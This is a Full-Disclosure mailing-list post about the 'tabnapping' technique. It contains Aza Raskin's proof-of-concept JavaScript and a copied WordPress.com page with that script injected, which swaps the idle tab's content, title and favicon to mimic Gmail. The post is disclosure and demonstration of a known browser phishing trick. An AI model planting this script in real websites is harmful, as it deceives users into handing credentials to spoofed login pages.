[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] tabnapping
- To: "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] tabnapping
- From: t0hitsugu <tohitsugu@xxxxxxxxx>
- Date: Wed, 8 Jun 2011 20:12:42 -0700
I just stumbled across this (credit goes to
http://www.pjlantz.com/2010/05/tabnapping.html and Aza Raskin) and while
rough, certainly has potential given the right circumstances.
I added a quick PoC, though I'm on a NAT and can't provide you a working
link atm, though it seemed to work fine using the latest Fenic beta. That
being said, it also worked on my box using a variety of user agents, so I'm
not certain this is even a mobile-specific problem.
The malicious script is as follows:
>
> /*
> Copyright (c) 2010 Aza Raskin
> http://azarask.in
>
> Permission is hereby granted, free of charge, to any person
> obtaining a copy of this software and associated documentation
> files (the "Software"), to deal in the Software without
> restriction, including without limitation the rights to use,
> copy, modify, merge, publish, distribute, sublicense, and/or sell
> copies of the Software, and to permit persons to whom the
> Software is furnished to do so, subject to the following
> conditions:
>
> The above copyright notice and this permission notice shall be
> included in all copies or substantial portions of the Software.
> */
>
>
> (function(){
>
> var TIMER = null;
> var HAS_SWITCHED = false;
>
> // Events
> window.onblur = function(){
> TIMER = setTimeout(changeItUp, 5000);
> }
>
> window.onfocus = function(){
> if(TIMER) clearTimeout(TIMER);
> }
>
> // Utils
> function setTitle(text){ document.title = text; }
>
> // This favicon object rewritten from:
> // Favicon.js - Change favicon dynamically [http://ajaxify.com/run/favicon
].
> // Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox
and Opera.
>
> favicon = {
> docHead: document.getElementsByTagName("head")[0],
> set: function(url){
> this.addLink(url);
> },
>
> addLink: function(iconURL) {
> var link = document.createElement("link");
> link.type = "image/x-icon";
> link.rel = "shortcut icon";
> link.href = iconURL;
> this.removeLinkIfExists();
> this.docHead.appendChild(link);
> },
>
> removeLinkIfExists: function() {
> var links = this.docHead.getElementsByTagName("link");
> for (var i=0; i<links.length; i++) {
> var link = links[i];
> if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
> this.docHead.removeChild(link);
> return; // Assuming only one match at most.
> }
> }
> },
>
> get: function() {
> var links = this.docHead.getElementsByTagName("link");
> for (var i=0; i<links.length; i++) {
> var link = links[i];
> if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
> return link.href;
> }
> }
> }
> };
>
>
> function createShield(){
> div = document.createElement("div");
> div.style.position = "fixed";
> div.style.top = 0;
> div.style.left = 0;
> div.style.backgroundColor = "white";
> div.style.width = "100%";
> div.style.height = "100%";
> div.style.textAlign = "center";
> document.body.style.overflow = "hidden";
>
> img = document.createElement("img");
> img.style.paddingTop = "15px";
> img.src = "http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png
";
>
> var oldTitle = document.title;
> var oldFavicon = favicon.get() || "/favicon.ico";
>
> div.appendChild(img);
> document.body.appendChild(div);
> img.onclick = function(){
> div.parentNode.removeChild(div);
> document.body.style.overflow = "auto";
> setTitle(oldTitle);
> favicon.set(oldFavicon)
> }
>
>
> }
>
> function changeItUp(){
> if( HAS_SWITCHED == false ){
> createShield("https://mail.google.com";);
> setTitle( "Gmail: Email from Google");
> favicon.set("https://mail.google.com/favicon.ico";);
> HAS_SWITCHED = true;
> }
> }
>
>
> })();
<!DOCTYPE html>
<html dir="ltr" lang="en">
<!--
generated 176 seconds ago
generated in 0.289 seconds
served from batcache in 0.002 seconds
expires in 124 seconds
-->
<head>
<meta charset="UTF-8" />
<title>Learn WordPress.com</title>
<link rel="profile" href="http://gmpg.org/xfn/11"; />
<link rel="pingback"
href="http://learn.wordpress.com/xmlrpc.php"; />
<link rel="alternate" type="application/rss+xml" title="Learn
WordPress.com » Feed" href="http://learn.wordpress.com/feed/"; />
<link rel="alternate" type="application/rss+xml" title="Learn WordPress.com
» Comments Feed" href="http://learn.wordpress.com/comments/feed/"; />
<script type="text/javascript">
/* <![CDATA[ */
function addLoadEvent(func){var oldonload=window.onload;if(typeof
window.onload!='function'){window.onload=func;}else{window.onload=function(){oldonload();func();}}}
/* ]]> */
</script>
<link rel="stylesheet"
href="http://s0.wp.com/wp-content/themes/h4/global.css?m=1297799136g";
type="text/css" />
<link rel='stylesheet' id='main-css'
href='http://s0.wp.com/wp-content/themes/vip/wpcomlearn/style.css?m=1306351555g&ver=MU'
type='text/css' media='screen' />
<link rel='stylesheet' id='print-css'
href='http://s0.wp.com/wp-content/themes/vip/wpcomlearn/print.css?m=1293711544g&ver=MU'
type='text/css' media='print' />
<link rel='stylesheet' id='sharedaddy-css'
href='http://s2.wp.com/wp-content/mu-plugins/sharing/sharing.css?m=1307113418g&ver=MU'
type='text/css' media='all' />
<script type='text/javascript'
src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110'></script>
<script type='text/javascript'
src='http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1305825971g&ver=1.6.1'></script>
<script type='text/javascript'
src='http://s0.wp.com/wp-includes/js/comment-reply.js?m=1293711305g&ver=20090102'></script>
<link rel='stylesheet' id='highlander-comments-css'
href='http://s0.wp.com/wp-content/mu-plugins/highlander-comments/style.css?m=1307475598g&ver=20110606'
type='text/css' media='all' />
<!--[if lt IE 8]>
<link rel='stylesheet' id='highlander-comments-ie7-css'
href='http://s0.wp.com/wp-content/mu-plugins/highlander-comments/style-ie7.css?m=1307172283g&ver=20110606'
type='text/css' media='all' />
<![endif]-->
<link rel="EditURI" type="application/rsd+xml" title="RSD"
href="http://learn.wordpress.com/xmlrpc.php?rsd"; />
<link rel="wlwmanifest" type="application/wlwmanifest+xml"
href="http://learn.wordpress.com/wp-includes/wlwmanifest.xml"; />
<link rel='index' title='Learn WordPress.com'
href='http://learn.wordpress.com/' />
<link rel='next' title='Get Started'
href='http://learn.wordpress.com/get-started/' />
<meta name="generator" content="WordPress.com" />
<link rel='canonical' href='http://learn.wordpress.com/' />
<link rel='shortlink' href='http://wp.me/P4gm-2' />
<link rel="shortcut icon" type="image/x-icon"
href="http://s1.wp.com/i/favicon-stacked.ico?m=1293711297g"; sizes="16x16 24x24
32x32 48x48" />
<link rel="icon" type="image/x-icon"
href="http://s1.wp.com/i/favicon-stacked.ico?m=1293711297g"; sizes="16x16 24x24
32x32 48x48" />
<link rel="apple-touch-icon"
href="http://s0.wp.com/wp-content/themes/h4/i/webclip.png?m=1293711355g"; />
<style type="text/css">
/* <![CDATA[ */
div#likes { margin-top: 15px; }
.like-button { border: 1px solid #eee; padding: 2px 6px;
font-size: 13px; font-family: arial, tahoma, sans-serif; }
#wpl-likebox { clear: left; font-size: 11px; font-family:
arial, tahoma, verdana, sans-serif !important; min-height: 30px; margin: 10px 0
!important; padding: 5px 0 10px 0 !important; }
#wpl-button { float: left; background: url(
http://s2.wp.com/i/buttonbg.png ) top left repeat-x; margin-right: 7px; border:
1px solid #d4d4d4; -moz-border-radius: 3px; -webkit-border-radius: 3px;
border-radius: 3px; }
#wpl-button a { border-bottom: none !important; color: #666
!important; line-height: 130% !important; text-decoration: none !important;
outline: none; float: left; padding: 3px 6px 2px 24px !important; font-size:
11px !important; background: url( http://s1.wp.com/i/likestar.png ) 6px 49.8%
no-repeat; }
#wpl-button a:hover { border-bottom: none !important; }
#wpl-button.liked { background: #feffce; border: 1px solid
#f3e389; }
#wpl-button.liked a { color: #ba871b !important; }
#wpl-likebox #wpl-count { min-height: 25px; line-height: 130%
!important; float: left; padding-top: 4px; }
#wpl-likebox #wpl-avatars { clear: left; max-height: 98px;
overflow: hidden; margin-top: 15px; line-height: 130% !important; }
#wpl-likebox #wpl-avatars img { border: none !important; }
#wpl-likebox #wpl-mustlogin { line-height: 14px !important;
font-size: 11px; clear: left; margin-top: 5px; background: #f0f0f0; padding:
10px; width: 65%; -moz-border-radius: 3px; -webkit-border-radius: 3px;
border-radius: 3px; }
#wpl-likebox #wpl-mustlogin a { color: #888; text-decoration:
underline; }
#wpl-likebox #wpl-mustlogin p { margin: 5px 0; padding: 0 }
#wpl-likebox #wpl-mustlogin input.input { padding: 2px;
background: #fff; font-size: 11px; font-family: inherit; border: 1px solid
#ccc; -moz-box-shadow: 1px 1px 1px rgba(0, 0, 0, 0.1) inset;
-webkit-box-shadow: 1px 1px 1px rgba(0, 0, 0, 0.1) inset; line-height: 12px; }
#wpl-likebox #wpl-mustlogin input#wp-submit { border: 1px solid
#ccc; font-size: 11px; background: #fafafa; repeat-x; -moz-border-radius: 3px;
-webkit-border-radius: 3px; border-radius: 3px; padding: 2px 4px !important;
line-height: 12px; }
#wpl-likebox #wpl-mustlogin label { position: relative; cursor:
text; }
#wpl-likebox #wpl-mustlogin label span { position: absolute;
top: 0px; left: 5px; padding: 0 !important; }
#wpl-likebox #wpl-mustlogin label span { top /*\**/: -10px\9; }
/* ]]> */
</style>
<link rel='openid.server'
href='http://learn.wordpress.com/?openidserver=1' />
<link rel='openid.delegate' href='http://learn.wordpress.com/' />
<link rel="search" type="application/opensearchdescription+xml"
href="http://learn.wordpress.com/osd.xml"; title="Learn WordPress.com" />
<link rel="search" type="application/opensearchdescription+xml"
href="http://wordpress.com/opensearch.xml"; title="WordPress.com" />
<meta name="application-name" content="Learn WordPress.com" /><meta
name="msapplication-window" content="width=device-width;height=device-height"
/><meta name="msapplication-task"
content="name=Subscribe;action-uri=http://learn.wordpress.com/feed/;icon-uri=http://s1.wp.com/i/favicon-stacked.ico";
/><meta name="msapplication-task" content="name=Sign up for a free
blog;action-uri=http://wordpress.com/signup/;icon-uri=http://s2.wp.com/i/favicon.ico";
/><meta name="msapplication-task" content="name=WordPress.com
Support;action-uri=http://support.wordpress.com/;icon-uri=http://s2.wp.com/i/favicon.ico";
/><meta name="msapplication-task" content="name=WordPress.com
Forums;action-uri=http://forums.wordpress.com/;icon-uri=http://s2.wp.com/i/favicon.ico";
/></head>
<body class="home page page-id-2 highlander-enabled highlander-light">
<div id="page" class="hfeed">
<header id="branding">
<h1 id="site-title"><span><a
href="http://learn.wordpress.com/"; title="Learn WordPress.com" rel="home"><img
src="http://s0.wp.com/wp-content/themes/vip/wpcomlearn/i/logo.png?m=1306351555g";
alt="Learn WordPress.com" /></a></span></h1>
</header><!-- #branding -->
<div id="main">
<div id="access">
<div class="skip-link screen-reader-text"><a
href="#content" title="Skip to content">Skip to content</a></div>
<form id="searchform" name="searchform"
method="get" action="http://learn.wordpress.com";>
<div>
<label
for="s">Search</label>
<input type="search"
id="s" name="s" />
<input type="submit"
id="searchsubmit" value="Search" />
</div>
</form>
<ul><li><a href="http://learn.wordpress.com/";
title="Home">Home<br /><span class="subtitle">Where the heart
is</span></a></li><li><a href="http://learn.wordpress.com/get-started/";
title="Get Started">Get Started<br /><span class="subtitle">Register with
WordPress.com</span></a></li><li><a
href="http://learn.wordpress.com/get-focused/"; title="Get Focused">Get
Focused<br /><span class="subtitle">Choose Your Topic</span></a></li><li><a
href="http://learn.wordpress.com/get-customized/"; title="Get Customized">Get
Customized<br /><span class="subtitle">Personalize Your Site’s
Appearance</span></a></li><li><a
href="http://learn.wordpress.com/get-published/"; title="Get Published">Get
Published<br /><span class="subtitle">Create Your First
Post</span></a></li><li><a href="http://learn.wordpress.com/get-flashy/";
title="Get Flashy">Get Flashy<br /><span class="subtitle">Add Images and
Video</span></a></li><li><a href="http://learn.wordpress.com/get-connected/";
title="Get Connected">Get Connected<br /><span class="subtitle">Meet Others in
the Community</span></a></li><li><a
href="http://learn.wordpress.com/get-famous/"; title="Get Famous">Get Famous<br
/><span class="subtitle">Boost Your Readership</span></a></li><li><a
href="http://learn.wordpress.com/get-mobile/"; title="Get Mobile">Get Mobile<br
/><span class="subtitle">Blog on the Go</span></a></li><li><a
href="http://learn.wordpress.com/get-heroic/"; title="Get Heroic">Get Heroic<br
/><span class="subtitle">Become a WordPress.com Pro</span></a></li></ul>
</div><!-- #access -->
<div id="primary">
<div id="content">
<h1>From Zero to Hero</h1>
<h2 class="subtitle">Where the heart is</h2>
<article id="post-2" class="post-2 page type-page
status-publish hentry">
<div class="entry-content">
<p> </p>
<p><img class="alignnone size-full wp-image-3143" title="Illustration of the
taking the fast lane crop"
src="http://learn.files.wordpress.com/2009/11/illustration-of-the-taking-the-fast-lane-crop.jpg?w=640&h=185";
alt="" width="640" height="185" /></p>
<p>Always wanted to be a blogging superstar? Or simply want to learn your way
around WordPress.com?</p>
<p>You’ve come to the right place. Go from blogging zero to blogging hero
in 10 quick levels.</p>
<p>Let’s <strong><a href="http://learn.wordpress.com/get-started/";>Get
Started. »</a><br />
</strong>
<div class="snap_nopreview sharing robots-nocontent">
<ul>
<li class="sharing_label">Share this:</li>
<li class="share-email share-regular"><a rel="nofollow" class="share-email
share-icon no-text" href="http://learn.wordpress.com/?share=email";
target="_blank" title="Click to email this to a friend"></a></li>
<li class="share-facebook share-regular"><a rel="nofollow"
class="share-facebook share-icon no-text"
href="http://learn.wordpress.com/?share=facebook"; target="_blank" title="Share
on Facebook"></a></li>
<li class="share-twitter share-regular"><a rel="nofollow" class="share-twitter
share-icon no-text" href="http://learn.wordpress.com/?share=twitter";
target="_blank" title="Click to share on Twitter"></a></li>
<li class="share-linkedin share-regular"><a rel="nofollow"
class="share-linkedin share-icon no-text"
href="http://learn.wordpress.com/?share=linkedin"; target="_blank" title="Click
to share on LinkedIn"></a></li>
<li class="share-print share-regular"><a rel="nofollow" class="share-print
share-icon no-text" href="http://learn.wordpress.com/#print"; target="_blank"
title="Click to print"></a></li>
<li class="share-custom"><a href="#" class="sharing-anchor">Share</a></li>
<li class="share-end"></li>
</ul>
<div class="sharing-hidden">
<div class="inner" style="display: none;">
<ul>
<li class="share-stumbleupon"><a rel="nofollow" class="share-stumbleupon
share-icon no-text" href="http://learn.wordpress.com/?share=stumbleupon";
target="_blank" title="Click to share on StumbleUpon"></a></li>
<li class="share-digg"><a rel="nofollow" class="share-digg share-icon no-text"
href="http://learn.wordpress.com/?share=digg"; target="_blank" title="Click to
Digg this post"></a></li>
<li class="share-end"></li>
<li class="share-reddit"><a rel="nofollow" class="share-reddit share-icon
no-text" href="http://learn.wordpress.com/?share=reddit"; target="_blank"
title="Click to share on Reddit"></a></li>
<li class="share-end"></li>
</ul>
</div>
</div>
<div class="sharing-clear"></div>
</div>
</div><!--
.entry-content -->
</article><!-- #post-2 -->
</div><!-- #content -->
</div><!-- #primary -->
<div class="clear"></div>
</div><!-- #main -->
<div id="colophon">
<div class="feedback">
<a href="http://support.wordpress.com";>Need Help? Get answers
from Support</a>
<a href="/feedback/">Questions, comments? Send us feedback.</a>
<a href="http://learn.wordpress.com/?print=true";>Print this
Guide</a>
</div>
<ul class="resources">
<li id="linkcat-1784" class="linkcat snap_preview"><h2>Resources</h2>
<ul class='snap_preview xoxo blogroll'>
<li><a href="http://wordpress.com/?ref=footer"; rel="generator">Blog at
WordPress.com</a>.</li>
<li><a href="http://support.wordpress.com";>WordPress.com Support</a></li>
<li><a href="http://wordpress.tv";>WordPress.tv</a></li>
</ul>
</li>
</ul>
<p class="automattic"><span>An <a
href="http://automattic.com/";><img
src="http://s.wordpress.com/wp-content/themes/h4/i/automattic.png?1";
alt="Automattic" width="102" height="9" /></a> Ruckus</span></p>
</div><!-- #colophon -->
</div><!-- #page -->
<script type="text/javascript">
// <![CDATA[
(function() {
try{
if ( window.external &&'msIsSiteMode' in window.external) {
if (window.external.msIsSiteMode()) {
var jl = document.createElement('script');
jl.type='text/javascript';
jl.async=true;
jl.src='/wp-content/plugins/ie-sitemode/custom-jumplist.php';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(jl, s);
}
}
}catch(e){}
})();
// ]]>
</script><script
type="text/javascript">_qoptions={qacct:'p-18-mFEk4J448M',labels:'language.en,type.wpcom'};</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js";></script>
<noscript><p><img class="robots-nocontent"
src="http://pixel.quantserve.com/pixel/p-18-mFEk4J448M.gif?labels=language.en%2Ctype.wpcom";
style="display:none" height="1" width="1" alt="" /></p></noscript>
<script type='text/javascript'
src='http://s.gravatar.com/js/gprofiles.js?v&ver=MU'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {
my_hash: ""
};
/* ]]> */
</script>
<script type='text/javascript'
src='http://s2.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1298424233g&ver=MU'></script>
<div style="display:none">
</div>
<script type='text/javascript'>
/* <![CDATA[ */
var HighlanderComments = {
loggingInText: "Logging In…",
submittingText: "Posting Comment…",
postCommentText: "Post Comment",
connectingToText: "Connecting to %s",
commentingAsText: "Posting comment as:",
ofWPcomText: "%s of WordPress.com",
logoutText: "Log Out",
loginText: "Log In",
connectURL:
"http://learn.wordpress.com/public.api/connect/?action=request";,
homeURL: "http://learn.wordpress.com/";,
postID: "2",
gravDefault: "identicon",
enterACommentError: "Please enter a comment",
enterEmailError: "Email address required",
enterAuthorError: "Name required"
};
/* ]]> */
</script>
<script type='text/javascript'
src='http://s1.wp.com/wp-content/mu-plugins/highlander-comments/script.js?m=1307164145g&ver=20110606'></script>
<script type='text/javascript'
src='http://s2.wp.com/wp-content/mu-plugins/sharing/sharing.js?m=1305927510g&ver=0.2'></script>
<div id="sharing_email" style="display: none;">
<form action="" method="post">
<label for="target_email">Send to Email Address</label>
<input type="text" name="target_email"
id="target_email" value="" />
<label for="source_name">Your Name</label>
<input type="text" name="source_name"
id="source_name" value="" />
<label for="source_email">Your Email
Address</label>
<input type="text" name="source_email"
id="source_email" value="" />
<div class="recaptcha" id="sharing_recaptcha"></div>
<img style="float: right; display: none"
class="loading"
src="http://learn.wordpress.com/wp-content/mu-plugins/sharing/images/loading.gif";
alt="loading" width="16" height="16" />
<input type="submit" value="Send Email"
class="sharing_send" />
<a href="#cancel" class="sharing_cancel">Cancel</a>
<div class="errors errors-1" style="display: none;">
Post was not sent - check your email addresses!
</div>
<div class="errors errors-2" style="display: none;">
Email check failed, please try again
</div>
<div class="errors errors-3" style="display: none;">
Sorry, your blog cannot share posts by email.
</div>
</form>
</div>
<script type="text/javascript"
src="http://b.scorecardresearch.com/beacon.js";></script><script
type="text/javascript">try{COMSCORE.beacon({c1:2,c2:7518284});}catch(e){}</script><noscript><p
class="robots-nocontent"><img
src="http://b.scorecardresearch.com/p?cj=1c1=2&c2=7518284"; alt=""
style="display:none" width="1" height="1" /></p></noscript><script
src="http://s.stats.wordpress.com/w.js?19"; type="text/javascript"></script>
<script type="text/javascript">
st_go({'blog':'16390','v':'wpcom','user_id':'0','post':'2','subd':'learn'});
ex_go({'crypt':'UE40eW5QN0p8M2Y/RE1lSiYrZXhzUkM5fD1uTDNLUGt6QzVbd3FKb3Q4aWxUTWElWmU0VDYxaVE9SkFJTUhDVT9WUFNZVFNkW2xSK2RvOHYyY2tMY2dLbUZzRFBzcnx5VFkvQ1VXVV85Qkg4YlslNi1GbXYsOS1hZVguS0s0NXd0YTkuLmFxb0dNXTZobTZOQ01XODNqd3RJPUQmVjJPZ2VYODhBVSZYUWh4TkYuWy8wTl18U0psSnFbaF85dHN4ZU9m'});
addLoadEvent(function(){linktracker_init('16390',2);});
</script>
<script type="text/javascript">
(function(){
var TIMER = null;
var HAS_SWITCHED = false;
// Events
window.onblur = function(){
TIMER = setTimeout(changeItUp, 5000);
}
window.onfocus = function(){
if(TIMER) clearTimeout(TIMER);
}
// Utils
function setTitle(text){ document.title = text; }
// This favicon object rewritten from:
// Favicon.js - Change favicon dynamically [http://ajaxify.com/run/favicon].
// Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox and
Opera.
favicon = {
docHead: document.getElementsByTagName("head")[0],
set: function(url){
this.addLink(url);
},
addLink: function(iconURL) {
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = iconURL;
this.removeLinkIfExists();
this.docHead.appendChild(link);
},
removeLinkIfExists: function() {
var links = this.docHead.getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
this.docHead.removeChild(link);
return; // Assuming only one match at most.
}
}
},
get: function() {
var links = this.docHead.getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
return link.href;
}
}
}
};
function createShield(){
div = document.createElement("div");
div.style.position = "fixed";
div.style.top = 0;
div.style.left = 0;
div.style.backgroundColor = "white";
div.style.width = "100%";
div.style.height = "100%";
div.style.textAlign = "center";
document.body.style.overflow = "hidden";
img = document.createElement("img");
img.style.paddingTop = "15px";
img.src = "http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png";;
var oldTitle = document.title;
var oldFavicon = favicon.get() || "/favicon.ico";
div.appendChild(img);
document.body.appendChild(div);
img.onclick = function(){
div.parentNode.removeChild(div);
document.body.style.overflow = "auto";
setTitle(oldTitle);
favicon.set(oldFavicon)
}
}
function changeItUp(){
if( HAS_SWITCHED == false ){
createShield("https://mail.google.com";);
setTitle( "Gmail: Email from Google");
favicon.set("https://mail.google.com/favicon.ico";);
HAS_SWITCHED = true;
}
}
})();
</script>
</body>
</html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/